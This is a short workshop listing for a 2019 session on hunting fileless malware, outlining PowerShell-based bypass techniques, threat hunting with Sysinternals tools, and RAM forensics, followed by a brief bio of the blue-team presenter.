Hunting fileless malware
2019-05-16, 11:00–13:00, Workshop Area

Fileless malware and system tools as bypass techniques in cyber-attack. Hunting with SysInternals tools and Digital Forensics techniques.

  1. Fileless malware and system tools as bypass technique: an explanation of “bypass technique” and “fileless malware”. Creating custom fileless malware by abusing Powershell.

  2. Threat hunting with Sysinternals tools: an explanation of system processes, threads, jobs, resources. Anomaly detection of system processes with Sysinternals tools. Fileless malware detection.

  3. Threat hunting with Digital Forensics techniques: an explanation of “digital forensics”. Acquisition and analysis of RAM memory dump with Digital Forensics tools.

  4. Summary or “what can participant obtain from this workshop”: knowledge about top bypass techniques, hard skills for detection and hunting malicious code, understand differences of hunting with SysInternals and Digital Forensics tools.

Blue teamer, Threat hunter, Digital Forensics Investigator and Chief Security Analyst in RMRF-team.